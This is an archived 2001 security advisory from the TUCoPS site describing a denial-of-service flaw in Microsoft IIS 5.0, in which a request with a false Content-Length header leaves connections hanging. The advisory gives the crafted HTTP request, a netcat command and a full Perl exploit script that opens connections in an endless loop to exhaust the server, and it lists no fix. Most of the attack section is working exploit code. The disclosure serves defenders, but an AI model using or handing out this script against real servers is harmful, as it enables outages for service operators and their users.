Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web :: IIS :: web4918.htm

IIS DoS



11th Dec 2001 [SBWID-4918]
COMMAND

	IIS DoS

SYSTEMS AFFECTED

	IIS 5.0

PROBLEM

	Ivan Hernandez Puga posted :
	

	When you send a bad request to Microsoft IIS/5.0  server  it  gives  you
	the  error  and  closes  the  connection,  like   when   you   fail   to
	authenticate. Well... let\'s take a look to a normal request:
	 

	GET /testfile HTTP/1.1

	Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,

	application/vnd.ms-excel, application/vnd.ms-powerpoint,

	application/msword, */*

	Accept-Language: en-us

	Accept-Encoding: gzip, deflate

	User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)

	Host: 192.168.0.10

	Connection: Keep-Alive

	Authorization: Basic

	

	And then let\'s add a \"Content-Length: 5300643\" field. When  you  send
	the new request to the  server  ir  hangs  there  waiting  something  to
	happen and never closes the connection.
	

	Example exploit:
	 

	$ cat \" GET /testfile HTTP/1.1

	Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,

	application/vnd.ms-excel, application/vnd.ms-powerpoint,

	application/msword, */*

	Accept-Language: en-us

	Accept-Encoding: gzip, deflate

	User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)

	Host: 192.168.0.10

	Connection: Keep-Alive

	Content-Length: 5300643

	Authorization: Basic\" >bogus.txt

	

	$ nc 192.168.0.10 80 

	

	

	 Update

	 ======

	

	Exploit script by Ivan Hernandez :
	

	 

	#!/usr/bin/perl

	# Written by Ivan Hernandez over code of Georgi Guninski=20

	use IO::Socket;

	

	print \"IIS 5.0 Bogus Content-Length\\n\";

	

	$port =3D @ARGV[1];

	$host =3D @ARGV[0];

	

		$req=3D\"GET /ampgn HTTP/1.1

	Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,

	application/vnd.ms-excel, application/vnd.ms-powerpoint,

	application/msword, */*

	Accept-Language: en-us

	Accept-Encoding: gzip, deflate

	User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)

	Host: 192.168.0.10

	Connection: Keep-Alive

	Content-Length: 5300643

	Authorization: Basic \" . \"A\" x 50000 . \"\\r\\n\\r\\n\";

	

	$i=3D0;

		while (1) {

			$socket[$i] =3D IO::Socket::INET->new(PeerAddr =3D>

	$host,PeerPort =3D> $port,Proto =3D> \"TCP\");

			syswrite($socket[$i],$req,length($req));

				print \".\";

				$i++;

		=09

		}

	

	$i=3D0;

	

	print \"\\nDone.\";

	

SOLUTION

	Nothing yet.


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH